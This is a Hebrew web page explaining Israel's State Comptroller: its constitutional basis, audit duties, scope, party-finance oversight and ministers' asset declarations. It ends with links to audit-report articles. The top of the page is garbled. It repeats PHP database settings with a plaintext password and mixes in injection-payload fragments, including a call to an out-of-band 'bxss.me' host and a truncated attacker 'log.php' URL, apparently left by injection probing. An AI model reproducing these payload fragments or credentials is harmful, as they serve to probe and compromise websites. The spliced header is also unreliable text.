$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> מבקר המדינה
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מבקר המדינה

תאריך: 01/08/2010 12:17   מחבר: מערכת האתר

חוק יסוד המבקר

חוק יסוד  מבקר המדינה, משנת התשמ"ח- 1988, קובע את מעמדה של ביקורת המדינה בישראל. חוק זה, משתלב עם חוקי היסוד האחרים, ומבסס את מעמדו החוקתי של מבקר המדינה ועצמאותו כמבקר אל מול הגופים המבוקרים.

מבקר המדינה נבחר על ידי הכנסת בהצבעה חשאית לתקופת כהונה אחת בת שבע שנים. במילוי תפקידיו אחראי המבקר בפני הכנסת בלבד ואינו תלוי בממשלה. בסמכות המבקר להחליט על הנושאים בהם תעסוק הביקורת לפי תוכנית שנתית. יש מקרים בהם הוועדה לענייני ביקורת המדינה, הכנסת או הממשלה, מבקשות מהמבקר להגיש חוות דעת. המבקר מגיש את תקציב משרדו לאישור ועדת הכספים של הכנסת. תקציב המבקר נבדק ומאושר לבסוף , ללא קשר לתקציב המדינה. את דוח ביצוע על התקציב שאושר מגיש המבקר לוועדה לענייני ביקורת המדינה. עצמאות המבקר באה לביטוי גם בקביעת תנאי שכר של עובדי משרדו, גיוס עובדים ופיטוריהם במקרה הצורך.

תפקידי המבקר

לפי אתר מבקר המדינה, הביקורת נבדלת במעמדה, מטרותיה ושיטותיה לעומת ביקורת ציבורית אחרת. הביקורת מוגדרת כאיסוף נתונים על פעולות הגופים המבוקרים ובחינתם לאור נורמות מחייבות. תהליך הביקורת מוגדר באתר המבקר כתהליך של הערכה בלתי תלויה של פעולות המדינה על מוסדותיה ותאגידיה.

מבקר המדינה, עושה ביקורת חיצונית על מגוון פעולותיהם של מינהל המדינה וגופים ציבוריים שונים, כדי להבטיח פיקוח על כספי ציבור ונשיאה באחריות  במקרה של תקלות ויישום המלצות ומסקנות הביקורת. למבקר המדינה גישה בלתי מוגבלת לחשבונותיהם של כל הגופים הכפופים לביקורתו, לכל מסמכיהם וכן למאגרי המידע שלהם.

במסגרת תפקידו אמון המבקר על בדיקת ההיבטים העיקריים כדלקמן:

 חוקיות וסדירות - המבקר בודק אם עובד ציבור שהורה לעשות שימוש בכספי ציבור למטרה כלשהי, פעל בהתאם להוראות החוק והנוהל המקנות לו את הסמכות לפעול כפי שפעל.

חסכון יעילות ואפקטיביות - בביקורת החיסכון נבדקות בעיקר התשומות שהושקעו בפעולה הנבדקת. בביקורת היעילות, נבדק היחס בין התשומות לתפוקות. בביקורת על האפקטיביות נבדק האם הושגו היעדים ברמת איכות התואמת לגודל ההשקעה בתשומות.

טוהר מידות - בהיבט זה נבדקת עמידתם של עובדי ציבור בנורמות ובכללי התנהגות מחייבים. לדוגמה: האם עובד הציבור פעל בניגוד עניינים, האם הפעיל שיקולים זרים, האם גילה משוא פנים וניצל לרעה את מעמדו. כללי ההתנהגות המצופים מעובדי הציבור אינם מוסדרים במערכת חוקים, בנהלים כתובים ובפסיקה. לכן, המבקר הוא זה שקובע את הנורמה הראויה שתשמש קו מנחה מחייב את עובדי הציבור שלא להפר אותו ולאל לחרוג ממנו.

היקף הביקורת

באתר המבקר נטען כי היקף הביקורת בישראל הוא מן הגדולים ביותר בעולם. ביקורת המדינה חלה על כל משרדי הממשלה, על מוסדות המדינה, על כל זרועות מערכת הביטחון (משרד הביטחון, צה"ל, התעשיות הצבאיות ואף היחידות החשאיות ביותר), ועל כל הרשויות המקומיות. עם הגופים העומדים לביקורת נמנות עשרות חברות ממשלתיות.

גוף מבוקר הוא גם כל גוף שהועמד לביקורת על פי חוק, על פי החלטת הכנסת או על פי הסכם בינו לבין הממשלה. גוף הנתמך בידי הממשלה גם הוא גוף מבוקר, אך הביקורת אינה מופעלת עליו, אלא אם כן החליטו על כך הוועדה לענייני ביקורת המדינה של הכנסת או המבקר, ובהיקף שהחליטו. עם אלה נמנים מוסדות ציבור גדולים, כגון האוניברסיטאות, קואופרטיבים לתחבורה ציבורית וכן גופים אחרים. המבקר רשאי להפעיל ביקורת גם על כל ארגון עובדים, ובלבד שהביקורת לא תופעל על פעילותו כאיגוד מקצועי.

נוסף על תפקידי הביקורת המתוארים לעיל הטיל המחוקק על מבקר המדינה  לעסוק בשני עניינים נוספים:

ביקורת על ניהול ענייני הכספים של הסיעות והמפלגות לפי חוק מימון מפלגות, התשל"ג- 1973. החוק נועד בעיקר לרסן את הוצאותיהן ואת תלותן בתורמים בעלי עניין. במסגרת הביקורת מבקר המדינה בודק את ההוצאות וההכנסות של המפלגות בתקופת הבחירות לכנסת ולרשויות המקומיות והאם הם היו בגבולות התקרה שנקבעה בחוק. 

במקרים בהם דוח מבקר המדינה אינו חיובי ומצביע  על חריגות - יש בידי מבקר המדינה להטיל על המפלגות והסיעות קנסות כספיים.

מניעת ניגוד עניינים - לפי הכללים שקבעה הממשלה ב -1977, למניעת ניגוד עניינים בפעילותם של שרים וסגני שרים, על שרים וסגני שרים להגיש למבקר המדינה עם כניסתם לתפקיד, ומדי שנה בשנה, הצהרה על הכנסותיהם, על נכסיהם, על ההון שברשותם,על עיסוקיהם ועל תפקידים נוספים שהם ממלאים. הכללים מטילים עליהם חובות ומגבלות בנוגע לעניינים האמורים ועל מבקר המדינה הוטל לבדוק אם הם עומדים בהם.

תגיות בעמוד:   ביקורת    מבקר    טוהר מידות    שחיתות    מימון    מפלגות    נורמות    ציבורי   
קיראו מידע ומאמרים נוספים באתר
הוצאות לינה חריגות במיוחד של שר הביטחון בסלון האווירי בפריז - מבקר המדינה ערך דוח ביקורת מיוחד אודות הוצאות השהייה והלינה של משלחת משרד הביטחון בראשות השר אהוד ברק לסלון האווירי בפריז. ממצאי הביקורת חמורים ומצביעים על מחדלים וחוסר רגישות ציבורית מצד עובדי ציבור ושרים.
יותר אורחים של שר הביטחון ופחות אנשי צבא בקבלת הפנים - בביקורת שערך מבקר המדינה בעניין קבלת הפנים של משרד הביטחון לרגל יום העצמאות בשנת 2009 נמצאו חריגות וליקויים רבים באשר לרשימת מוזמני שר הביטחון לעומת הקיטון ברשימת המוזמנים מטעם הצבא
מה עשו ממשלות ישראל בעניינו של יהונתן פולארד - הוועדה לענייני ביקורת המדינה של הכנסת,קבלה החלטה ביום 1.12.07 לבקש ממבקר המדינה להכין חוות דעת אודות פעולות ממשלות ישראל בנוגע לטיפול ולמאמצים להביא לשחרורו של יהונתן פולארד כאזרח המדינה מהכלא האמריקאי , וכמי שהוכר על ידי הממשלה כסוכן ישראלי.
מבקר המדינה בדק את הליך מינוי הקצונה הבכירה בצה"ל - מבקר המדינה פרסם דוח מיוחד אודות הליך מינוי הקצונה הבכירה בצה"ל. הביקורת מצאה כי הליך המינוי עד לדרגת אלוף הוא מובנה ומשתפר בהליך מינוי אלופים יש מקום לשיפורים וקביעת נהלים ברורים
ליקויי בטיחות בתחום התעופה האזרחית בישראל - לפי ממצאי דוח מבקר המדינה מחודש ספטמבר 2010 נותרו ליקויים רבים בתחום בטיחות התעופה האזרחית שטרם תוקנו. עצם קיום הליקויים עלול לגרום לתאונות אוויריות ברמה של אסון לאומי.
ממצאים חמורים בדוח מבקר המדינה אודות קופת חולים מאוחדת - דוח מבקר המדינה חשף ממצאים חמורים שהובאו לידיעת היועץ המשפטי לממשלה בנוגע להתנהלות הלקויה של הנהלת קופת חולים מאוחדת
ליקויים חמורים בהיערכות שירותי הכבאות וההצלה לעת חרום - מבקר המדינה קובע בדוח מעקב אודות הערכות מערך כיבוי והצלה כי הוא אינו ערוך לעת חרום והמסקנות מהדוח לאחר מלחת לבנון השנייה לא יושמו
נמצאו ליקויים בביקורת מבקר המדינה בבית נשיא המדינה - מבקר המדינה בדק את התנהלות בית הנשיא במהלך השנים 2000 ועד 2008 ומצא ליקויים שנדרשים לתיקון בכל הקשור לגיוס כוח אדם, מכרזים, מתן תרומות וחסויות
מבקר המדינה מצא ליקויים רבים בטיפול בנכסים של נספי שואה - מבקר המדינה בדק את תפקודה של החברה להשבת נכסי שואה ומצא ליקויים רבים בתפקודה מה שבא לביטוי במיון התיקים, איתור נכסים ויורשים ומימוש הנכסים ליורשים החוקיים
מבקר המדינה השלים בדיקת פרשת הקרקעות של יואב גלנט - מבקר המדינה השלים את בדיקתו בעניין פרשת הקרקעות ומצא ליקויים בהתנהלותו של הרמטכל המיועד. ממצאיו הועברו לעיון והחלטה של היועץ המשפטי לממשלה שקיבל החלטה שלא להגן על גלנט בעתירה לבג"צ שהוגשה נגדו בגין פלישה לקרקעות לא לו.
ליקויים מהותיים בתפקוד ראש הממשלה בטיפול במשט התורכי - מבקר המדינה בדק את הליך קבלת ההחלטות בעניין המשט הטורקי ומצא ליקויים מהותיים בהתנהלות ראש הממשלה במהלך ההתמודדות עם המשט והשלכותיו
הוצאות ובזבוזים של המפלגות מכספי הציבור - דוח מבקר המדינה לשנת 2011 חושף את מסכת הבזבובזים של כל המפלגות מכספי הציבור.